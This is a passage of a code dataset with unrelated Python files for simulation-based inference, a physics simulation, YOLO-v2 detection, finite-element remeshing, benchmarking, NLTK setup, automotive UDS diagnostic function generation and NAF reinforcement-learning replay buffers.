torch.tensor([x_o, x_o,..., x_o])` such that\n we can later evaluate p(theta_n|x_o) for every parameter set theta_n in inputs\n If context has shape or (N, dim_x) and inputs has shape (N, dim_theta), we leave\n context unaltered as `context = torch.tensor([x_1, x_2,..., x_N])` such that we can\n later evaluate p(theta_n|x_n) for every parameter set theta_n in inputs with\n n={1,...,N}\n\n Args:\n inputs: input variables / parameters / thetas\n context: conditioning variables / contexts / x. If None, the context is ignored.\n true_context: if context=None, replace it with true_context\n correct_for_leakage:\n If True, we normalize the output density\n by drawing samples, estimating the acceptance\n ratio, and then scaling the probability with it\n\n Returns:\n inputs, context with same batch dimension\n \"\"\"\n\n # cast inputs to tensor if they are not already\n inputs = torch.as_tensor(inputs)\n\n # add batch dimension to `inputs` if needed. `inputs` how has shape\n # (1, num_dim_inputs) or (N, num_dim_inputs), but not (num_dim_inputs)\n inputs = utils.torchutils.ensure_parameter_batched(inputs)\n\n # use \"default context\" if None is provided\n if context is None:\n context = true_context\n # cast context to tensor if they are not already\n context = torch.as_tensor(context)\n\n # add batch dimension to `context` if needed. `context` how has shape\n # (1, num_dim_context) or (N, num_dim_context), but not (num_dim_context)\n # todo: this will break if we have a multi-dimensional context, e.g. images\n if len(context.shape) == 1:\n context = context.unsqueeze(0)\n\n # if multiple observations, with snpe avoid expensive leakage\n # correction by rejection sampling\n if context.shape[0] > 1 and correct_for_leakage:\n raise ValueError(\n \"Only a single context allowed for log-prob when normalizing the density.\"\n \"Please use a for-loop over your inputs and contexts.\"\n )\n\n if context.shape[0] != inputs.shape[0]:\n # multiple parameters, single observation:\n # repeat the context to match the parameters\n context = context.repeat(inputs.shape[0], 1)\n\n if inputs.shape[0] != context.shape[0]:\n # catch all remaining errors after shape-mangling above\n # THIS SHOULD NEVER HAPPEN\n raise ValueError(\n \"Number of input items must be equal to number of context items.\"\n )\n\n return inputs, context\n\n\ndef sample_posterior_within_prior(\n posterior_nn: torch.nn.Module,\n prior: torch.distributions.Distribution,\n context: torch.Tensor,\n num_samples: int = 1,\n patience: int = 5,\n) -> Tuple[torch.Tensor, float]:\n \"\"\"Return samples from a posterior within the support of the prior via rejection sampling. \n \n This is relevant for snpe methods and flows for which the posterior tends to have mass outside the prior boundaries. \n \n This function uses rejection sampling with samples from posterior, to do two things: \n 1) obtain posterior samples within the prior support. \n 2) calculate the fraction of accepted samples as a proxy for correcting the density during evaluation of the posterior. \n \n Arguments:\n posterior_nn {torch.nn.Module} -- neural net representing the posterior\n prior {torch.distributions.Distribution} -- torch distribution prior\n context {torch.Tensor} -- context for the posterior, i.e., the observed data to condition on. \n \n Keyword Arguments:\n num_samples {int} -- number of sample to generate (default: {1})\n patience {int} -- upper time bound in minutes, in case sampling takes too long due to strong leakage (default: {5})\n \n Returns:\n Tuple[torch.Tensor, float] -- Accepted samples, and estimated acceptance probability\n \"\"\"\n\n assert (\n not posterior_nn.training\n ), \"posterior nn is in training mode, but has to be in eval mode for sampling.\"\n\n samples = []\n num_remaining = num_samples\n num_sampled_total = 0\n tstart = time.time()\n time_over = time.time() - tstart > (patience * 60)\n\n while num_remaining > 0 and not time_over:\n\n sample = posterior_nn.sample(num_remaining, context=context)\n num_sampled_total += num_remaining\n\n is_within_prior = torch.isfinite(prior.log_prob(sample))\n num_in_prior = is_within_prior.sum().item()\n\n if num_in_prior > 0:\n samples.append(sample[is_within_prior,].reshape(num_in_prior, -1))\n num_remaining -= num_in_prior\n\n # update timer\n time_over = time.time() - tstart > (patience * 60)\n\n # collect all samples in the list into one tensor\n samples = torch.cat(samples)\n\n # estimate acceptance probability\n acceptance_prob = float((samples.shape[0]) / num_sampled_total)\n\n if num_remaining > 0:\n warnings.warn(\n f\"Beware: Rejection sampling resulted in only {samples.shape[0]} samples within patience of {patience} min. Consider having more patience, leakage is {1-acceptance_prob}\"\n )\n\n return samples, acceptance_prob\n","sub_path":"sbi/utils/sbiutils.py","file_name":"sbiutils.py","file_ext":"py","file_size_in_byte":6656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"104302193","text":"import Siconos.Numerics as Numerics\n\nt0 = 0\nT = 7\nh = 0.0005\ng = 9.81\ntheta = 0.50001\nmu = 0.7\ndump_itermax = 100\ndump_probability = .02\nNewtonMaxIter = 20\nitermax = 100000\ntolerance = 1e-8\nsolver = Numerics.SICONOS_FRICTION_3D_NSGS\n\nfileName = \"BoxesStack1\"\ntitle = \"Boxes Stack\"\ndescription = \"\"\"\nBoxes (Cubes) stacking with Bullet collision detection\nMoreau TimeStepping: h={0}, theta = {1}\nOne Step non smooth problem: {2}, maxiter={3}, tol={4}\n\"\"\".format(h, theta, Numerics.idToName(solver),\n itermax,\n tolerance)\n\nmathInfo = \"\"\n","sub_path":"siconos/BoxesStack/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"106040593","text":"\n\"\"\"YOLO-v2 model.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\n\nimport joblib\nfrom utils import util\nfrom easydict import EasyDict as edict\nimport numpy as np\nimport tensorflow as tf\nfrom nn_skeleton import ModelSkeleton\n\n\nclass YOLO_V2(ModelSkeleton):\n def __init__(self, mc, gpu_id):\n with tf.device('/gpu:{}'.format(gpu_id)):\n ModelSkeleton.__init__(self, mc)\n\n self.BN = mc.BN\n self._add_forward_graph()\n self._add_yolo_interpret_graph()\n #self._add_yolo_loss_graph()\n #self._add_train_graph()\n #self._add_viz_graph()\n\n def _add_forward_graph(self):\n \"\"\"Build the VGG-16 model.\"\"\"\n\n if self.mc.LOAD_PRETRAINED_MODEL:\n assert tf.gfile.Exists(self.mc.PRETRAINED_MODEL_PATH), \\\n 'Cannot find pretrained model at the given path:' \\\n ' {}'.format(self.mc.PRETRAINED_MODEL_PATH)\n self.caffemodel_weight = joblib.load(self.mc.PRETRAINED_MODEL_PATH)\n\n with tf.variable_scope('darknet19') as scope:\n conv1 = self._conv_layer(\n 'conv1', self.image_input, filters=32, size=3, stride=1, bn=self.BN, act='lrelu', freeze=True)\n pool1 = self._pooling_layer(\n 'pool1', conv1, size=2, stride=2)\n conv2 = self._conv_layer(\n 'conv2', pool1, filters=64, size=3, stride=1, bn=self.BN, act='lrelu', freeze=True)\n pool2 = self._pooling_layer(\n 'pool2', conv2, size=2, stride=2)\n conv3 = self._conv_layer(\n 'conv3', pool2, filters=128, size=3, stride=1, bn=self.BN, act='lrelu')\n conv4 = self._conv_layer(\n 'conv4', conv3, filters=64, size=1, stride=1, bn=self.BN, act='lrelu')\n conv5 = self._conv_layer(\n 'conv5', conv4, filters=128, size=3, stride=1, bn=self.BN, act='lrelu')\n pool3 = self._pooling_layer(\n 'pool3', conv5, size=2, stride=2)\n conv6 = self._conv_layer(\n 'conv6', pool3, filters=256, size=3, stride=1, bn=self.BN, act='lrelu')\n conv7 = self._conv_layer(\n 'conv7', conv6, filters=128, size=1, stride=1, bn=self.BN, act='lrelu')\n conv8 = self._conv_layer(\n 'conv8', conv7, filters=256, size=3, stride=1, bn=self.BN, act='lrelu')\n pool4 = self._pooling_layer(\n 'pool4', conv8, size=2, stride=2)\n conv9 = self._conv_layer(\n 'conv9', pool4, filters=512, size=3, stride=1, bn=self.BN, act='lrelu')\n conv10 = self._conv_layer(\n 'conv10', conv9, filters=256, size=1, stride=1, bn=self.BN, act='lrelu')\n conv11 = self._conv_layer(\n 'conv11', conv10, filters=512, size=3, stride=1, bn=self.BN, act='lrelu')\n conv12 = self._conv_layer(\n 'conv12', conv11, filters=256, size=1, stride=1, bn=self.BN, act='lrelu')\n conv13 = self._conv_layer(\n 'conv13', conv12, filters=512, size=3, stride=1, bn=self.BN, act='lrelu')\n pool5 = self._pooling_layer(\n 'pool5', conv13, size=2, stride=2)\n conv14 = self._conv_layer(\n 'conv14', pool5, filters=1024, size=3, stride=1, bn=self.BN, act='lrelu')\n conv15 = self._conv_layer(\n 'conv15', conv14, filters=512, size=1, stride=1, bn=self.BN, act='lrelu')\n conv16 = self._conv_layer(\n 'conv16', conv15, filters=1024, size=3, stride=1, bn=self.BN, act='lrelu')\n conv17 = self._conv_layer(\n 'conv17', conv16, filters=512, size=1, stride=1, bn=self.BN, act='lrelu')\n conv18 = self._conv_layer(\n 'conv18', conv17, filters=1024, size=3, stride=1, bn=self.BN, act='lrelu')\n\n with tf.variable_scope('detector') as scope:\n conv19 = self._conv_layer(\n 'conv19', conv18, filters=1024, size=3, stride=1, bn=self.BN, act='lrelu')\n conv20 = self._conv_layer(\n 'conv20', conv19, filters=1024, size=3, stride=1, bn=self.BN, act='lrelu')\n reorg20 = self._reorg_layer('reorg20', conv13, stride=2)\n concat20 = self._concat_layer('concat20', conv20, reorg20)\n conv21 = self._conv_layer(\n 'conv21', concat20, filters=1024, size=3, stride=1, bn=self.BN, act='lrelu')\n num_output = self.mc.ANCHOR_PER_GRID * (self.mc.CLASSES + 1 + 4)\n self.preds = self._conv_layer(\n 'conv22', conv21, filters=num_output, size=1, stride=1,\n padding='SAME', xavier=False, act=None, stddev=0.0001)\n self.conv13 = conv13\n self.conv20 = conv20\n self.reorg20 = reorg20\n self.concat20 = concat20\n","sub_path":"src/nets/yolo_v2.py","file_name":"yolo_v2.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"408495866","text":"# Importing the Kratos Library\nimport KratosMultiphysics as KM\n\n# Import applications\nimport KratosMultiphysics.StructuralMechanicsApplication as SMA\nimport KratosMultiphysics.ContactStructuralMechanicsApplication as CSMA\n\nimport KratosMultiphysics.kratos_utilities as kratos_utilities\nif kratos_utilities.CheckIfApplicationsAvailable(\"MeshingApplication\"):\n has_meshing_application = True\nelse:\n has_meshing_application = False\n\n# Import adaptive remeshing utilities\nimport KratosMultiphysics.ContactStructuralMechanicsApplication.adaptative_remeshing_contact_structural_mechanics_utilities as adaptative_remeshing_contact_structural_mechanics_utilities\n\n# Import base class file\nimport KratosMultiphysics.ContactStructuralMechanicsApplication.contact_structural_mechanics_implicit_dynamic_solver as contact_structural_mechanics_implicit_dynamic_solver\n\ndef CreateSolver(model, custom_settings):\n return AdaptativeRemeshingContactImplicitMechanicalSolver(model, custom_settings)\n\nclass AdaptativeRemeshingContactImplicitMechanicalSolver(contact_structural_mechanics_implicit_dynamic_solver.ContactImplicitMechanicalSolver):\n \"\"\"The contact structural mechanics implicit dynamic solver. (Fot adaptative remeshing)\n See contact_structural_mechanics_implicit_dynamic_solver.py for more information.\n \"\"\"\n def __init__(self, model, custom_settings):\n # Set defaults and validate custom settings.\n self.adaptative_remeshing_utilities = adaptative_remeshing_contact_structural_mechanics_utilities.AdaptativeRemeshingContactMechanicalUtilities()\n\n # Construct the base solver.\n super(AdaptativeRemeshingContactImplicitMechanicalSolver, self).__init__(model, custom_settings)\n KM.Logger.PrintInfo(\"::[AdaptativeRemeshingContactImplicitMechanicalSolver]:: \", \"Construction finished\")\n\n #### Private functions ####\n\n def AddVariables(self):\n super(AdaptativeRemeshingContactImplicitMechanicalSolver, self).AddVariables()\n if has_meshing_application:\n self.main_model_part.AddNodalSolutionStepVariable(KM.NODAL_H)\n KM.Logger.PrintInfo(\"::[AdaptativeRemeshingContactImplicitMechanicalSolver]:: \", \"Variables ADDED\")\n\n def get_remeshing_process(self):\n if not hasattr(self, '_remeshing_process'):\n self._remeshing_process = self._create_remeshing_process()\n return self._remeshing_process\n\n def _create_remeshing_process(self):\n if self.main_model_part.ProcessInfo[KM.DOMAIN_SIZE] == 2:\n remeshing_process = MA.MmgProcess2D(self.main_model_part, self.settings[\"remeshing_parameters\"])\n else:\n remeshing_process = MA.MmgProcess3D(self.main_model_part, self.settings[\"remeshing_parameters\"])\n\n return remeshing_process\n\n def get_metric_process(self):\n if not hasattr(self, '_metric_process'):\n self._metric_process = self._create_metric_process()\n return self._metric_process\n\n def _create_metric_process(self):\n if self.main_model_part.ProcessInfo[KM.DOMAIN_SIZE] == 2:\n metric_process = MA.MetricErrorProcess2D(self.main_model_part, self.settings[\"metric_error_parameters\"])\n else:\n metric_process = MA.MetricErrorProcess3D(self.main_model_part, self.settings[\"metric_error_parameters\"])\n\n return metric_process\n\n def _CreateConvergenceCriterion(self):\n error_criteria = self.settings[\"convergence_criterion\"].GetString()\n conv_settings = self._get_convergence_criterion_settings()\n return self.adaptative_remeshing_utilities.GetConvergenceCriteria(error_criteria, conv_settings)\n\n @classmethod\n def GetDefaultParameters(cls):\n this_defaults = adaptative_remeshing_contact_structural_mechanics_utilities.AdaptativeRemeshingContactMechanicalUtilities().GetDefaultParameters()\n this_defaults.AddMissingParameters(super().GetDefaultParameters())\n return this_defaults\n","sub_path":"applications/ContactStructuralMechanicsApplication/python_scripts/adaptative_remeshing_contact_structural_mechanics_implicit_dynamic_solver.py","file_name":"adaptative_remeshing_contact_structural_mechanics_implicit_dynamic_solver.py","file_ext":"py","file_size_in_byte":3946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"599612691","text":"import config as cf\nimport sys\nimport controller\nimport xlsxwriter\nassert cf\n\ndefault_limit = 1000\nsys.setrecursionlimit(default_limit*10)\n\ndef TestFunction(catalog, option, data_structure, sorting_method, input_1, input_2, input_3):\n if option == 1:\n artists_sample_size = input_1\n artworks_sample_size = input_2\n catalog = controller.initCatalog(data_structure)\n controller.loadData(catalog, data_structure, artists_sample_size, artworks_sample_size)\n result = catalog\n\n elif option == 2:\n initial_birth_year = input_1\n end_birth_year = input_2\n requirement_info = controller.getArtistsByBirthYear(catalog, data_structure,\n initial_birth_year, end_birth_year)\n elapsed_time = requirement_info[0]\n result = elapsed_time\n\n elif option == 3:\n initial_adquisiton_date = input_1\n end_adquisition_date = input_2\n requirement_info = controller.getArtworksByAdquisitonDate(catalog, data_structure, sorting_method,\n initial_adquisiton_date, end_adquisition_date)\n elapsed_time = requirement_info[0]\n result = elapsed_time\n\n elif option == 4:\n artist_name = input_1\n requirement_info = controller.getArtworksByMediumAndArtist(catalog, artist_name)\n elapsed_time = requirement_info[0]\n result = elapsed_time\n\n elif option == 5:\n requirement_info = controller.getNationalitiesByNumArtworks(catalog, data_structure, sorting_method)\n elapsed_time = requirement_info[0]\n result = elapsed_time\n\n elif option == 6: \n department = input_1\n requirement_info = controller.getTransportationCostByDepartment(catalog, data_structure, \n sorting_method, department)\n elapsed_time = requirement_info[0]\n result = elapsed_time\n\n else:\n num_artists = input_1\n initial_birth_year = input_2\n end_birth_year = input_3\n requirement_info = controller.getMostProlificArtists(catalog, data_structure, sorting_method,\n initial_birth_year, end_birth_year, num_artists)\n elapsed_time = requirement_info[0]\n result = elapsed_time\n return result\n\ndef InitiateFunction():\n requeriment_test = { 2: (1900, 1905, 0),\n 3: ('1985-01-01', '2000-01-01', 0),\n 4: ('Alexei Jawlensky', 0, 0),\n 5: (0, 0, 0),\n 6: ('Drawings & Prints', 0, 0),\n 7: (3, 1900, 1905)}\n data_structure_test = { (381, 346):requeriment_test,\n (762, 691):requeriment_test,\n (1141, 1037):requeriment_test,\n (1523, 1382):requeriment_test,\n (1903, 1727):requeriment_test,\n (2284, 2073):requeriment_test}\n Test_Data = { 'SINGLE_LINKED':data_structure_test,\n 'ARRAY_LIST':data_structure_test}\n\n\n workbook = xlsxwriter.Workbook('Test_Data.xlsx')\n worksheet = workbook.add_worksheet()\n alphabet = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I','J', 'K', 'L', 'M',\n 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n\n initial_x_position = 0\n for data_structure in Test_Data:\n data_structure_info = Test_Data[data_structure]\n initial_y_position = -9\n for sample in data_structure_info:\n input_1 = sample[0]\n input_2 = sample[1]\n print('')\n print(None, 1, data_structure, 0, input_1, input_2, 0)\n print('...')\n catalog = TestFunction(None, 1, data_structure, 0, input_1, input_2, 0)\n sample_info = data_structure_info[sample]\n initial_y_position += 1\n y_position = initial_y_position\n for requirement in sample_info:\n inputs = sample_info[requirement]\n input_1 = inputs[0]\n input_2 = inputs[1]\n input_3 = inputs[2]\n y_position += 9\n x_position_time = initial_x_position\n for sorting_method in range(1,5):\n x_position_time += 1 \n position_time_index = alphabet[x_position_time - 1] + str(y_position)\n print(sample, requirement, data_structure, sorting_method, input_1, input_2, input_3)\n elapsed_time = TestFunction(catalog, requirement, data_structure, sorting_method, input_1, input_2, input_3)\n worksheet.write(position_time_index, elapsed_time)\n initial_x_position += 5\n workbook.close()\n\nInitiateFunction()","sub_path":"App/Test_Function.py","file_name":"Test_Function.py","file_ext":"py","file_size_in_byte":4927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"634688002","text":"def histogram(t):\n d = {}\n for x in t:\n d[x] = d.get(x,0) + 1\n return d\n\ndef choose_from_hist(dist):\n import random\n letters = []\n for a,b in dist.items():\n for i in range(b):\n letters.append(a)\n return random.choice(letters)","sub_path":"ex_13.5.py","file_name":"ex_13.5.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"144940477","text":"from django.conf import settings\nfrom django.core.management.base import BaseCommand, CommandError\nfrom optparse import make_option\nimport nltk as py_nltk\nimport os\n\nclass Command(BaseCommand):\n args = 'command'\n help = ''\n\n def handle(self, *args, **options):\n if hasattr(settings, 'NLTK_DATAPATH'):\n NLTK_DATAPATH = settings.NLTK_DATAPATH\n else:\n NLTK_DATAPATH = os.path.join(os.path.dirname(py_nltk.__file__), \"data\")\n required_packages = ['punkt', 'floresta', 'mac_morpho', 'stopwords', 'wordnet']\n installed = all(py_nltk.downloader._downloader.is_installed(package, download_dir=NLTK_DATAPATH) for package in required_packages)\n if not installed:\n py_nltk.download(required_packages, download_dir=NLTK_DATAPATH)\n\n","sub_path":"mail/management/commands/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"494399729","text":"import os\nfrom collections import OrderedDict\n\nclass Clusters(OrderedDict):\n def __getitem__(self, item):\n try:\n value = dict.__getitem__(self, item)\n except KeyError:\n raise Exception(\"The current hostname '%s' was not included in the variable\"\"\" % item +\n \" 'Clusters' in the CalcTrollHosts.py file. Please edit this file.\")\n else:\n return value\n\nCLUSTERS = Clusters()\nDEFAULT_CLUSTER_KEY = os.uname()[1]\n","sub_path":"CalcTroll/Core/Submission/Clusters.py","file_name":"Clusters.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"336501778","text":"#!/usr/bin/env python\n\n__author__ = \"Richard Clubb\"\n__copyrights__ = \"Copyright 2018, the python-uds project\"\n__credits__ = [\"Richard Clubb\"]\n\n__license__ = \"MIT\"\n__maintainer__ = \"Richard Clubb\"\n__email__ = \"richard.clubb@embeduk.com\"\n__status__ = \"Development\"\n\n\nfrom uds.uds_config_tool import DecodeFunctions\nimport sys\nfrom uds.uds_config_tool.FunctionCreation.iServiceMethodFactory import IServiceMethodFactory\n\n\n# When encode the dataRecord for transmission we have to allow for multiple elements in the data record\n# i.e. 'value1' - for a single value, or [('param1','value1'),('param2','value2')] for more complex data records\nrequestFuncTemplate = str(\"def {0}(FormatIdentifier, MemoryAddress, MemorySize):\\n\"\n \" addrlenfid = [len(MemoryAddress) + (len(MemorySize)<<4)]\\n\"\n \" return {1} + FormatIdentifier + addrlenfid + MemoryAddress + MemorySize\")\t\t\t\t\t\t \n\ncheckFunctionTemplate = str(\"def {0}(input):\\n\"\n \" serviceIdExpected = {1}\\n\"\n \" serviceId = DecodeFunctions.buildIntFromList(input[{2}:{3}])\\n\"\n \" addrlenfid = DecodeFunctions.buildIntFromList(input[{3}:{3}+1]) # ... next byte\\n\"\n \" totalLength = {4} + 1 + (addrlenfid>>4) # ... length of sid, length of addrlenfid, length of maxNumOfBlockLen extracted from addrlenfid\\n\"\n \" if(len(input) != totalLength): raise Exception(\\\"Total length returned not as expected. Expected: totalLength; Got {{0}}\\\".format(len(input)))\\n\"\n \" if(serviceId != serviceIdExpected): raise Exception(\\\"Service Id Received not expected. Expected {{0}}; Got {{1}} \\\".format(serviceIdExpected, serviceId))\")\n\nnegativeResponseFuncTemplate = str(\"def {0}(input):\\n\"\n \" result = {{}}\\n\"\n \" nrcList = {5}\\n\"\n \" if input[{1}:{2}] == [{3}]:\\n\"\n \" result['NRC'] = input[{4}]\\n\"\n \" result['NRC_Label'] = nrcList.get(result['NRC'])\\n\"\n \" return result\")\n\nencodePositiveResponseFuncTemplate = str(\"def {0}(input):\\n\"\n \" result = {{}}\\n\"\n \" result['LengthFormatIdentifier'] = input[1:2]\\n\"\n \" lenMNOBL = (result['LengthFormatIdentifier'][0])>>4\\n\"\n \" result['MaxNumberOfBlockLength'] = input[2:2+lenMNOBL]\\n\"\n \" return result\")\n\n\nclass RequestDownloadMethodFactory(IServiceMethodFactory):\n\n ##\n # @brief method to create the request function for the service element\n # The parameters for request download are fixed in format, so we can simply take fixed paramters and format the message accordingly\n # i.e. we're less reliant on what the odx file says in this case.\n @staticmethod\n def create_requestFunction(diagServiceElement, xmlElements):\n serviceId = 0\n\n shortName = \"request_{0}\".format(diagServiceElement.find('SHORT-NAME').text)\n requestElement = xmlElements[diagServiceElement.find('REQUEST-REF').attrib['ID-REF']]\n paramsElement = requestElement.find('PARAMS')\n\n encodeFunctions = []\n encodeFunction = \"None\"\n\n for param in paramsElement:\n semantic = None\n try:\n semantic = param.attrib['SEMANTIC']\n except AttributeError:\n pass\n\n if(semantic == 'SERVICE-ID'):\n serviceId = [int(param.find('CODED-VALUE').text)]\n elif semantic == 'DATA':\n dataObjectElement = xmlElements[(param.find('DOP-REF')).attrib['ID-REF']]\n break\n # ... if we've gotten this far, then we probably have enough from the ODX to ensure we have the service defined ... following the spec from here on.\n\n funcString = requestFuncTemplate.format(shortName,\n serviceId)\n exec(funcString)\n return locals()[shortName]\n\n\n\n ##\n # @brief method to create the function to check the positive response for validity\n # The response for request download are fixed in format, so we can check the message accordingly\n # i.e. we're less reliant on what the odx file says in this case.\n @staticmethod\n def create_checkPositiveResponseFunction(diagServiceElement, xmlElements):\n responseId = 0\n\n responseIdStart = 0\n responseIdEnd = 0\n\n shortName = diagServiceElement.find('SHORT-NAME').text\n checkFunctionName = \"check_{0}\".format(shortName)\n positiveResponseElement = xmlElements[(diagServiceElement.find('POS-RESPONSE-REFS')).find('POS-RESPONSE-REF').attrib['ID-REF']]\n\n paramsElement = positiveResponseElement.find('PARAMS')\n\n responseLength = 0\n\n for param in paramsElement:\n try:\n semantic = None\n try:\n semantic = param.attrib['SEMANTIC']\n except AttributeError:\n pass\n\n startByte = int(param.find('BYTE-POSITION').text)\n\n if(semantic == 'SERVICE-ID'):\n responseId = int(param.find('CODED-VALUE').text)\n bitLength = int((param.find('DIAG-CODED-TYPE')).find('BIT-LENGTH').text)\n listLength = int(bitLength / 8)\n responseIdStart = startByte\n responseIdEnd = startByte + listLength\n responseLength += listLength\n\n elif(semantic == 'DATA'):\n dataObjectElement = xmlElements[(param.find('DOP-REF')).attrib['ID-REF']]\n break\n\t\t\t\t # ... if we've gotten this far, then we probably have enough from the ODX to ensure we have the service defined ... following the spec from here on. \n\n else:\n pass\n except:\n #print(sys.exc_info())\n pass\n\n checkFunctionString = checkFunctionTemplate.format(checkFunctionName, # 0\n responseId, # 1\n responseIdStart, # 2\n responseIdEnd, # 3\n responseLength) # 4\n exec(checkFunctionString)\n return locals()[checkFunctionName]\n\n\n def create_encodePositiveResponseFunction(diagServiceElement, xmlElements):\n\n positiveResponseElement = xmlElements[(diagServiceElement.find('POS-RESPONSE-REFS')).find('POS-RESPONSE-REF').attrib['ID-REF']]\n\n shortName = diagServiceElement.find('SHORT-NAME').text\n encodePositiveResponseFunctionName = \"encode_{0}\".format(shortName)\n\n params = positiveResponseElement.find('PARAMS')\n\n responseLength = 0\n encodeFunctions = []\n\n for param in params:\n try:\n semantic = None\n try:\n semantic = param.attrib['SEMANTIC']\n except AttributeError:\n pass\n\n if(semantic == 'SERVICE-ID'):\n responseId = int(param.find('CODED-VALUE').text)\n bitLength = int((param.find('DIAG-CODED-TYPE')).find('BIT-LENGTH').text)\n listLength = int(bitLength / 8)\n responseIdStart = startByte\n responseIdEnd = startByte + listLength\n responseLength += listLength\n\n if semantic == 'DATA':\n dataObjectElement = xmlElements[(param.find('DOP-REF')).attrib['ID-REF']]\n break\n\t\t\t\t # ... if we've gotten this far, then we probably have enough from the ODX to ensure we have the service defined ... following the spec from here on. \n\n except:\n pass\n\n encodeFunctionString = encodePositiveResponseFuncTemplate.format(encodePositiveResponseFunctionName)\n exec(encodeFunctionString)\n return locals()[encodePositiveResponseFunctionName]\n\n\n\n ##\n # @brief method to create the negative response function for the service element\n @staticmethod\n def create_checkNegativeResponseFunction(diagServiceElement, xmlElements):\n shortName = diagServiceElement.find('SHORT-NAME').text\n check_negativeResponseFunctionName = \"check_negResponse_{0}\".format(shortName)\n\n negativeResponsesElement = diagServiceElement.find('NEG-RESPONSE-REFS')\n\n negativeResponseChecks = []\n\n for negativeResponse in negativeResponsesElement:\n negativeResponseRef = xmlElements[negativeResponse.attrib['ID-REF']]\n\n negativeResponseParams = negativeResponseRef.find('PARAMS')\n\n for param in negativeResponseParams:\n\n semantic = None\n try:\n semantic = param.attrib['SEMANTIC']\n except:\n semantic = None\n\n bytePosition = int(param.find('BYTE-POSITION').text)\n\n if semantic == 'SERVICE-ID':\n serviceId = param.find('CODED-VALUE').text\n start = int(param.find('BYTE-POSITION').text)\n diagCodedType = param.find('DIAG-CODED-TYPE')\n bitLength = int((param.find('DIAG-CODED-TYPE')).find('BIT-LENGTH').text)\n listLength = int(bitLength/8)\n end = start + listLength\n elif bytePosition == 2:\n nrcPos = bytePosition\n expectedNrcDict = {}\n try:\n dataObjectElement = xmlElements[(param.find('DOP-REF')).attrib['ID-REF']]\n nrcList = dataObjectElement.find('COMPU-METHOD').find('COMPU-INTERNAL-TO-PHYS').find('COMPU-SCALES')\n for nrcElem in nrcList:\n expectedNrcDict[int(nrcElem.find('UPPER-LIMIT').text)] = nrcElem.find('COMPU-CONST').find('VT').text\n except:\n pass\n pass\n\n negativeResponseFunctionString = negativeResponseFuncTemplate.format(check_negativeResponseFunctionName, start, end, serviceId, nrcPos, expectedNrcDict)\n exec(negativeResponseFunctionString)\n return locals()[check_negativeResponseFunctionName]\n","sub_path":"uds/uds_config_tool/FunctionCreation/RequestDownloadMethodFactory.py","file_name":"RequestDownloadMethodFactory.py","file_ext":"py","file_size_in_byte":10670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"309370815","text":"from logging import getLogger\n\nfrom .utils import core\n\nlogger = getLogger(__name__)\n\nimport numpy as np\nimport tensorflow as tf\nfrom .utils.prioritised_experience_replay import PrioritizedReplayBuffer\n\n\nclass ReplayBuffer:\n \"\"\"\n A simple FIFO experience replay buffer for NAF_debug agents.\n \"\"\"\n\n def __init__(self, obs_dim, act_dim, size):\n self.obs1_buf = np.zeros([size, obs_dim], dtype=np.float32)\n self.obs2_buf = np.zeros([size, obs_dim], dtype=np.float32)\n self.acts_buf = np.zeros([size, act_dim], dtype=np.float32)\n self.rews_buf = np.zeros(size, dtype=np.float32)\n self.done_buf = np.zeros(size, dtype=np.float32)\n self.ptr, self.size, self.max_size = 0, 0, size\n\n def store(self, obs, act, rew, next_obs, done):\n self.obs1_buf[self.ptr] = obs\n self.obs2_buf[self.ptr] = next_obs\n self.acts_buf[self.ptr] = act\n self.rews_buf[self.ptr] = rew\n self.done_buf[self.ptr] = done\n self.ptr = (self.ptr + 1) % self.max_size\n self.size = min(self.size + 1, self.max_size)\n\n def sample_batch(self, batch_size=32):\n if self.size < batch_size:\n idxs = np.arange(self.size)\n else:\n idxs = np.random.randint(0, self.size, size=batch_size)\n return dict(obs1=self.obs1_buf[idxs],\n obs2=self.obs2_buf[idxs],\n acts=self.acts_buf[idxs],\n rews=self.rews_buf[idxs],\n done=self.done_buf[idxs])\n\n\nclass ReplayBufferPER(PrioritizedReplayBuffer):\n \"\"\"\n A simple FIFO experience replay buffer for NAF_debug agents.\n \"\"\"\n\n def __init__(self, obs_dim, act_dim, size, prio_info):\n self.alpha = prio_info.get('alpha')\n self.beta = prio_info.get('beta')\n super(ReplayBufferPER, self).__init__(size, self.alpha)\n self.ptr, self.size, self.max_size = 0, 0, size\n\n def store(self, obs, act, rew, next_obs, done):\n super(ReplayBufferPER, self).add(obs, act, rew, next_obs, done, 1)\n self.ptr = (self.ptr + 1) % self.max_size\n self.size = min(self.size + 1, self.max_size)\n\n def sample_batch(self, batch_size=32, **kwargs):\n if 'beta' in kwargs:\n self.beta = kwargs.get('beta')\n # print('kw beta', self.beta)\n # print('test', self.size, batch_size)\n if self.size < batch_size:\n batch_size = self.size\n obs1, acts, rews, obs2, done, gammas, weights, idxs = super(ReplayBufferPER, self).sample_normal(batch_size)\n else:\n obs1, acts, rews, obs2, done, gammas, weights, idxs = super(ReplayBufferPER, self).sample(\n batch_size=batch_size,\n beta=self.beta)\n return dict(obs1=obs1,\n obs2=obs2,\n acts=acts,\n rews=rews,\n done=done), [weights, idxs]\n\n\nclass NAF(object):\n def __init__(self, sess,\n env, stat,\n discount, batch_size, learning_rate,\n max_steps, update_repeat, max_episodes, tau, pretune=None, 